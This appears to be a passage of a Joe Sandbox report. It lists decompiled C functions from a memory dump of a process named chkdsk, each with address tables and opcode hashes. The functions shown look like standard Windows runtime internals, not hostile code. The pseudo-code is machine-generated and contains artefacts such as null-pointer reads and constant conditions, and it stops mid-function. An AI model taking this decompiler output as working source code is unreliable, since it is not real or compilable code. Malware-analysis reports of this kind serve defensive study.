                                                      0x04db2b26
                                                      0x04db2b29
                                                      0x04db2b81
                                                      0x04db2b84
                                                      0x04db2c0e
                                                      0x04db2c15
                                                      0x04db2c24
                                                      0x04db2c24
                                                      0x04db2b8a
                                                      0x04db2b8a
                                                      0x04db2b8a
                                                      0x04db2b8a
                                                      0x04db2b90
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2b4a
                                                      0x04db2b4a
                                                      0x04db2b4d
                                                      0x04db2b53
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2b55
                                                      0x04db2b58
                                                      0x04db2bb7
                                                      0x04df5d1b
                                                      0x04df5d37
                                                      0x04df5d47
                                                      0x04df5d53
                                                      0x04db2bbd
                                                      0x04db2bbd
                                                      0x04db2bbd
                                                      0x04db2bb7
                                                      0x04db2b5d
                                                      0x04db2c2f
                                                      0x04df5d5b
                                                      0x04df5d77
                                                      0x04df5d87
                                                      0x04df5d93
                                                      0x04db2c35
                                                      0x04db2c35
                                                      0x04db2c35
                                                      0x04db2c2f
                                                      0x04db2b65
                                                      0x04db2b9f
                                                      0x04db2ba2
                                                      0x04db2b67
                                                      0x04db2b67
                                                      0x04db2b69
                                                      0x04db2b6b
                                                      0x04db2b6e
                                                      0x04db2bc9
                                                      0x04db2bcc
                                                      0x04db2bcf
                                                      0x04db2bd4
                                                      0x04db2bd6
                                                      0x04db2bd6
                                                      0x04db2bdb
                                                      0x04db2c02
                                                      0x04db2c05
                                                      0x04db2c07
                                                      0x00000000
                                                      0x04db2c07
                                                      0x04db2be0
                                                      0x04db2c00
                                                      0x04db2c3f
                                                      0x04db2c3f
                                                      0x00000000
                                                      0x04db2c00
                                                      0x04db2be5
                                                      0x04db2be7
                                                      0x04db2bec
                                                      0x04db2bf4
                                                      0x04db2bf6
                                                      0x00000000
                                                      0x04db2bf6
                                                      0x04db2b70
                                                      0x04db2b76
                                                      0x04db2b2b
                                                      0x04db2b2b
                                                      0x04db2b2d
                                                      0x04db2b2f
                                                      0x04db2b32
                                                      0x04db2b35
                                                      0x04db2b3a
                                                      0x00000000
                                                      0x04db2b40
                                                      0x04db2b43
                                                      0x04db2b45
                                                      0x04db2b47
                                                      0x04db2b4a
                                                      0x04db2b4d
                                                      0x04db2b53
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2b53
                                                      0x04db2b78
                                                      0x04db2b78
                                                      0x04db2b7b
                                                      0x04db2b7e
                                                      0x00000000
                                                      0x04db2b7e
                                                      0x04db2b76
                                                      0x04db2ba5
                                                      0x04db2ba5
                                                      0x04db2ba8
                                                      0x04db2bad
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2baf
                                                      0x04db2baf
                                                      0x04db2bc2
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90698d608a70f9ebd2d76ad9be6835ef0b80f216cc763233946e17bd19ca0dc8
                                                      • Instruction ID: d91a6986c22025477e7758d6ebe0384e1e14f7e44ba19f7eb571eaca9b015c29
                                                      • Opcode Fuzzy Hash: 90698d608a70f9ebd2d76ad9be6835ef0b80f216cc763233946e17bd19ca0dc8
                                                      • Instruction Fuzzy Hash: 9B51CE77B00115CB8B14DF19C8988FEB7B1FB88711705849AE8869B319EA34FE40DBD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4AE44 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E04E4AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04E4C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04E4ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E04E4FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E04E4EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04DA7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04E41608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04E51536(0x4e78ae4, (_t74 -  *0x4e78b04 >> 0x14) + (_t74 -  *0x4e78b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L04E4C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E04E4A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E04E2CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E04E4ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                      0x04e4ae44
                                                      0x04e4ae4c
                                                      0x04e4ae53
                                                      0x04e4ae55
                                                      0x04e4ae5c
                                                      0x04e4ae64
                                                      0x04e4ae68
                                                      0x04e4ae75
                                                      0x04e4ae75
                                                      0x04e4ae78
                                                      0x04e4ae7a
                                                      0x04e4ae7c
                                                      0x04e4ae7f
                                                      0x04e4aea8
                                                      0x04e4aeab
                                                      0x04e4aead
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aeb3
                                                      0x04e4aeb8
                                                      0x04e4aebb
                                                      0x04e4aebd
                                                      0x00000000
                                                      0x04e4ae81
                                                      0x04e4ae88
                                                      0x04e4ae8f
                                                      0x04e4ae9b
                                                      0x04e4ae96
                                                      0x04e4ae96
                                                      0x04e4ae96
                                                      0x04e4aea0
                                                      0x04e4aea3
                                                      0x04e4aebf
                                                      0x04e4aebf
                                                      0x04e4aec3
                                                      0x04e4aec9
                                                      0x04e4af0d
                                                      0x04e4af14
                                                      0x04e4af3d
                                                      0x04e4af3d
                                                      0x04e4af41
                                                      0x04e4af44
                                                      0x04e4af67
                                                      0x04e4af67
                                                      0x04e4af6a
                                                      0x04e4afca
                                                      0x04e4afd1
                                                      0x00000000
                                                      0x04e4afd1
                                                      0x04e4af6c
                                                      0x04e4af6d
                                                      0x04e4af75
                                                      0x04e4af7c
                                                      0x04e4af7e
                                                      0x04e4af80
                                                      0x04e4af85
                                                      0x04e4af87
                                                      0x04e4af99
                                                      0x04e4af89
                                                      0x04e4af92
                                                      0x04e4af92
                                                      0x04e4af9e
                                                      0x04e4afa1
                                                      0x04e4afa3
                                                      0x04e4afa9
                                                      0x04e4afb0
                                                      0x04e4afb2
                                                      0x04e4afb4
                                                      0x04e4afbc
                                                      0x04e4afbc
                                                      0x04e4afb4
                                                      0x04e4afb0
                                                      0x00000000
                                                      0x04e4afa1
                                                      0x04e4af4f
                                                      0x04e4af57
                                                      0x04e4af5c
                                                      0x04e4af5e
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4af60
                                                      0x04e4af64
                                                      0x04e4af64
                                                      0x00000000
                                                      0x04e4af64
                                                      0x04e4af1a
                                                      0x04e4af25
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4af27
                                                      0x04e4af28
                                                      0x04e4af33
                                                      0x00000000
                                                      0x04e4aed0
                                                      0x04e4aed0
                                                      0x04e4aed2
                                                      0x04e4aee1
                                                      0x04e4aee4
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aee6
                                                      0x04e4aeec
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aefb
                                                      0x04e4af07
                                                      0x04e4afd3
                                                      0x04e4afdb
                                                      0x04e4afdb
                                                      0x00000000
                                                      0x04e4af07
                                                      0x04e4aed6
                                                      0x04e4aed8
                                                      0x04e4aedf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aedf
                                                      0x04e4aec9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63ea9ecca5ee797cb8640c74d9434f2b4c7489f4660c3119dbc65472ac85e63f
                                                      • Instruction ID: ed941bc497cdb36161f985c60e618def6e132e7abe32b2901ed9249bc1c359cc
                                                      • Opcode Fuzzy Hash: 63ea9ecca5ee797cb8640c74d9434f2b4c7489f4660c3119dbc65472ac85e63f
                                                      • Instruction Fuzzy Hash: D941F5B17442119BDB25DF25E884B7BB39AEFC4738F045229F82687290D734F941C6A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DADBE9 Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E04DADBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04D8CC50(E04D84510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04DA7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04E58ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04DA2280(_t58, _v44);
						E04DADD82(_v44, _t102, _t98);
						E04DAB944(_t102, _v5);
						return E04D9FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4e78628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4e7862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4e78628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4e7862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4e4fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                      0x04dadbe9
                                                      0x04dadbf2
                                                      0x04dadbf7
                                                      0x04dadbf9
                                                      0x04dadbfc
                                                      0x04dadc00
                                                      0x04dadc03
                                                      0x04dadc14
                                                      0x04dadd54
                                                      0x04dadd54
                                                      0x04dadd54
                                                      0x04dadc18
                                                      0x04dadc1d
                                                      0x04dadc1d
                                                      0x04dadc32
                                                      0x04dadc3b
                                                      0x04dadc3e
                                                      0x04dadc46
                                                      0x04dadd5b
                                                      0x04dadd62
                                                      0x04dadd64
                                                      0x04dadd67
                                                      0x04dadd69
                                                      0x04dadd6b
                                                      0x04dadd6e
                                                      0x04dadd70
                                                      0x04dadd73
                                                      0x04dadd73
                                                      0x00000000
                                                      0x04dadc4c
                                                      0x04dadc4e
                                                      0x04df3ae3
                                                      0x04df3ae8
                                                      0x04df3aea
                                                      0x04dadce7
                                                      0x04dadce9
                                                      0x04dadcec
                                                      0x04dadcee
                                                      0x04dadcf0
                                                      0x04dadcf3
                                                      0x04dadcf5
                                                      0x04df3af2
                                                      0x04df3af5
                                                      0x04df3af5
                                                      0x04dadd06
                                                      0x04dadd08
                                                      0x04dadd0b
                                                      0x04dadd12
                                                      0x04df3b08
                                                      0x04dadd18
                                                      0x04dadd18
                                                      0x04dadd18
                                                      0x04dadd20
                                                      0x04dadd23
                                                      0x04df3b16
                                                      0x04df3b16
                                                      0x04dadd29
                                                      0x04dadd2d
                                                      0x04dadd36
                                                      0x04dadd40
                                                      0x04dadd51
                                                      0x04dadd51
                                                      0x04dadc54
                                                      0x04dadc59
                                                      0x04dadc59
                                                      0x04dadc5e
                                                      0x04dadc5e
                                                      0x04dadc63
                                                      0x04dadc66
                                                      0x04dadc6b
                                                      0x04dadc78
                                                      0x04dadc7b
                                                      0x04dadc81
                                                      0x04dadc81
                                                      0x04dadc83
                                                      0x04dadc89
                                                      0x00000000
                                                      0x00000000
                                                      0x04dadd7b
                                                      0x04dadd7b
                                                      0x04dadc8f
                                                      0x04dadc8f
                                                      0x04dadc92
                                                      0x04dadc99
                                                      0x04dadc9f
                                                      0x04dadca5
                                                      0x04dadcaa
                                                      0x04dadcaa
                                                      0x04dadcb3
                                                      0x04dadcb8
                                                      0x04dadcbb
                                                      0x04dadcc1
                                                      0x04dadccf
                                                      0x04dadcd2
                                                      0x04dadcd5
                                                      0x04dadcd7
                                                      0x04dadcda
                                                      0x04dadcdc
                                                      0x04dadcdc
                                                      0x04dadce2
                                                      0x04dadce4
                                                      0x00000000
                                                      0x04dadce4

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f8f712b7de28f84c7272ef137b648442a0a4f457cc18fe784656d01f3ac5986
                                                      • Instruction ID: fb5428dad31f74165170d709eed741ccd38da9585403a38dd9f7a596236554c0
                                                      • Opcode Fuzzy Hash: 0f8f712b7de28f84c7272ef137b648442a0a4f457cc18fe784656d01f3ac5986
                                                      • Instruction Fuzzy Hash: CB519B71A00605DFCF14DFA8C480AAEBBF2FB48310F21855AD995A7744EB70B954CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9EF40 Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E04D9EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04D89080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x775ec21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04D82D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                      0x04d9ef4b
                                                      0x04d9ef4d
                                                      0x04d9ef57
                                                      0x04d9f0bd
                                                      0x04d9f0c2
                                                      0x04d9f0d2
                                                      0x04d9f0d2
                                                      0x04d9f0c2
                                                      0x04d9ef5d
                                                      0x04d9ef5f
                                                      0x04d9ef67
                                                      0x04d9ef6a
                                                      0x04d9ef6d
                                                      0x04d9ef74
                                                      0x04d9ef7f
                                                      0x04d9ef82
                                                      0x04d9ef82
                                                      0x04d9ef86
                                                      0x04d9ef88
                                                      0x04d9ef8c
                                                      0x04d9ef8f
                                                      0x04d9ef8f
                                                      0x04d9ef8f
                                                      0x00000000
                                                      0x04d9ef91
                                                      0x04d9ef93
                                                      0x04d9efc4
                                                      0x04d9efc4
                                                      0x04d9efc4
                                                      0x04d9efca
                                                      0x04d9efd0
                                                      0x04d9f0a6
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9f0af
                                                      0x04debb06
                                                      0x04debb0a
                                                      0x04d9f0b5
                                                      0x04d9f0b5
                                                      0x04d9f0b5
                                                      0x04d9f0b5
                                                      0x00000000
                                                      0x04d9efd6
                                                      0x04d9efd9
                                                      0x04d9f0de
                                                      0x04d9f0e2
                                                      0x04d9efdf
                                                      0x04d9efdf
                                                      0x04d9efdf
                                                      0x04d9efe5
                                                      0x04debafc
                                                      0x04debafc
                                                      0x04d9efe5
                                                      0x04d9efeb
                                                      0x04d9efed
                                                      0x04d9f00f
                                                      0x04d9f011
                                                      0x04d9f01a
                                                      0x04d9f01d
                                                      0x04d9f021
                                                      0x04d9f028
                                                      0x04d9f029
                                                      0x04d9f029
                                                      0x04d9f02c
                                                      0x00000000
                                                      0x04d9f02c
                                                      0x04d9eff3
                                                      0x04d9eff9
                                                      0x04d9f0ea
                                                      0x04d9f0ed
                                                      0x04d9f0ef
                                                      0x00000000
                                                      0x04d9f0ef
                                                      0x04d9f003
                                                      0x04debb12
                                                      0x04d9f045
                                                      0x04d9f049
                                                      0x04d9f051
                                                      0x04d9f09e
                                                      0x04d9f0a0
                                                      0x04d9f0a0
                                                      0x04d9f09e
                                                      0x04d9f053
                                                      0x04d9f064
                                                      0x04d9f064
                                                      0x04d9f06b
                                                      0x04debb1a
                                                      0x04debb1a
                                                      0x04d9f071
                                                      0x04d9f071
                                                      0x04d9f07d
                                                      0x04d9f082
                                                      0x04d9f08f
                                                      0x04d9f08f
                                                      0x04d9f009
                                                      0x04d9f00d
                                                      0x00000000
                                                      0x04d9f00d
                                                      0x04d9efd0
                                                      0x04d9ef97
                                                      0x04d9efa5
                                                      0x04d9efaa
                                                      0x00000000
                                                      0x04d9efac
                                                      0x04d9efac
                                                      0x04d9efac
                                                      0x00000000
                                                      0x04d9efb2
                                                      0x04d9f036
                                                      0x04d9f03a
                                                      0x04d9f040
                                                      0x04d9f090
                                                      0x00000000
                                                      0x04d9f092
                                                      0x04d9f042
                                                      0x00000000
                                                      0x04d9f042
                                                      0x04d9efb7
                                                      0x04d9efb9
                                                      0x04d9efbc
                                                      0x04d9efb0
                                                      0x04d9efb0
                                                      0x00000000
                                                      0x04d9efbe
                                                      0x04d9efbe
                                                      0x04d9efc1
                                                      0x00000000
                                                      0x04d9efc1
                                                      0x04d9efbc
                                                      0x04d9efaa
                                                      0x04d9ef91

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction ID: 7b55e2ab05584d4aa66f7fc188e00c511ddf8efc0d19fc04080e1446926a5992
                                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction Fuzzy Hash: DD51AB30B04249ABDF24CF6980907AEBBF1BB05314F2881AED589D7281D375BD89D791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E5740D Relevance: .1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E04E5740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04DDD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04DCF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04DA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
